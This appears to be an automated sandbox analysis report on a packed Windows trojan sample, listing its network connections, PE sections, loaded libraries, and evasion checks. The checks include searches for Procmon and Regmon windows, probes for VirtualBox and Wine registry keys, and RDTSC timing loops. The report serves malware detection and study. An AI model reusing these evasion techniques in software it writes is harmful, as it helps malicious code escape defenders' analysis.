    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2

    System Summary

    Source: file.exe | Static PE information: section name:
    Source: file.exe | Static PE information: section name: .rsrc
    Source: file.exe | Static PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00540228
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00542030
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057A0D0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E8A0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00535160
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053E1A0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00574A40
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053A300
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055C470
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054049B
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544487
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537CA4
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055FD10
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054C5F0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005335B0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053BEB0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00546EBF
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053AF10
    Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0054D300 appears 47 times
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exe | Static PE information: Section: ZLIB complexity 0.9995874587458746
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/5@11/2
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6988
    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\05bbaa9c-104d-4d88-b3fb-58b18fa506fa
    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: file.exe | String found in binary or memory: xRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh
    Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
    Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936
    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
    Source: file.exe | Static file information: File size 2963456 > 1048576
    Source: file.exe | Static PE information: Raw size of uinrpldy is bigger than: 0x100000 < 0x2aa000

    Data Obfuscation

    Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W;uinrpldy:EW;bdkjvfmn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;uinrpldy:EW;bdkjvfmn:EW;.taggant:EW;
    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
    Source: file.exe Static PE information: real checksum: 0x2e2b59 should be: 0x2d4b8a
    Source: file.exe Static PE information: section name:
    Source: file.exe Static PE information: section name: .rsrc
    Source: file.exe Static PE information: section name: .idata
    Source: file.exe Static PE information: section name: uinrpldy
    Source: file.exe Static PE information: section name: bdkjvfmn
    Source: file.exe Static PE information: section name: .taggant
    Source: file.exe Static PE information: section name: entropy: 7.9847073555245185

    Boot Survival

    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59484B second address: 594852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707CAE second address: 707CDA instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192480B8h 0x00000008 ja 00007EFF192480C9h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707CDA second address: 707CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707CDF second address: 707D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFF192480C3h 0x0000000e jmp 00007EFF192480BDh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707F9B second address: 707FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007EFF192B60FEh 0x0000000d jng 00007EFF192B60EAh 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7082D7 second address: 7082F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFF192480B6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFF192480C3h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7082F7 second address: 7082FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7082FB second address: 708301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708301 second address: 708307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708307 second address: 70831C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70831C second address: 708320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 708320 second address: 708336 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007EFF192480BCh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7084B1 second address: 7084D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192B60F6h 0x00000008 pushad 0x00000009 js 00007EFF192B60E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7084D2 second address: 7084D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A07C second address: 70A0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D2618h], eax 0x0000000c push 00000000h 0x0000000e movzx edi, si 0x00000011 push 277B8F56h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007EFF192B60F5h 0x0000001e push eax 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A0AD second address: 70A137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 277B8FD6h 0x00000010 movsx esi, di 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2B0Dh] 0x0000001b push 00000000h 0x0000001d movsx esi, cx 0x00000020 push 00000003h 0x00000022 or edx, 09456019h 0x00000028 push F4D1B3CCh 0x0000002d pushad 0x0000002e jg 00007EFF192480CCh 0x00000034 jmp 00007EFF192480C6h 0x00000039 jne 00007EFF192480BCh 0x0000003f popad 0x00000040 xor dword ptr [esp], 34D1B3CCh 0x00000047 mov dword ptr [ebp+122D1D61h], edx 0x0000004d add edi, dword ptr [ebp+122D2CE9h] 0x00000053 lea ebx, dword ptr [ebp+12449F4Bh] 0x00000059 and edx, 20CAE82Eh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 jng 00007EFF192480B6h 0x0000006b popad 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A19E second address: 70A1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A1A2 second address: 70A1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFF192480C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A1C7 second address: 70A1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A1CB second address: 70A1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and edi, 5A017D71h 0x0000000e push 00000000h 0x00000010 mov edi, edx 0x00000012 call 00007EFF192480B9h 0x00000017 jmp 00007EFF192480BBh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A1F7 second address: 70A1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A1FC second address: 70A216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A216 second address: 70A230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A230 second address: 70A266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007EFF192480BCh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jc 00007EFF192480E3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFF192480C4h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A373 second address: 70A405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60F3h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dx, 1400h 0x00000011 xor dword ptr [ebp+122D2955h], ebx 0x00000017 push 00000000h 0x00000019 mov dl, C0h 0x0000001b mov edi, dword ptr [ebp+122D2E59h] 0x00000021 push B3533331h 0x00000026 jmp 00007EFF192B60EBh 0x0000002b add dword ptr [esp], 4CACCD4Fh 0x00000032 sub dword ptr [ebp+122D1D6Bh], eax 0x00000038 push 00000003h 0x0000003a sub ecx, 70FDE648h 0x00000040 push 00000000h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007EFF192B60E8h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e call 00007EFF192B60E9h 0x00000063 jmp 00007EFF192B60EBh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A405 second address: 70A40F instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A40F second address: 70A45F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007EFF192B60F5h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 pushad 0x00000016 jno 00007EFF192B60E6h 0x0000001c jmp 00007EFF192B60EBh 0x00000021 popad 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A45F second address: 70A465 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A465 second address: 70A46A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A46A second address: 70A4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007EFF192480B8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 lea ebx, dword ptr [ebp+12449F5Fh] 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007EFF192480B8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D2618h], esi 0x00000048 xchg eax, ebx 0x00000049 jne 00007EFF192480CEh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A4E7 second address: 70A4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A4EB second address: 70A4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A4EF second address: 70A4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A4F5 second address: 70A50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF332 second address: 6FF338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF338 second address: 6FF33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF33D second address: 6FF367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF192B60F1h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FF367 second address: 6FF377 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A36B second address: 72A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A371 second address: 72A375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A375 second address: 72A391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A391 second address: 72A399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A399 second address: 72A39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
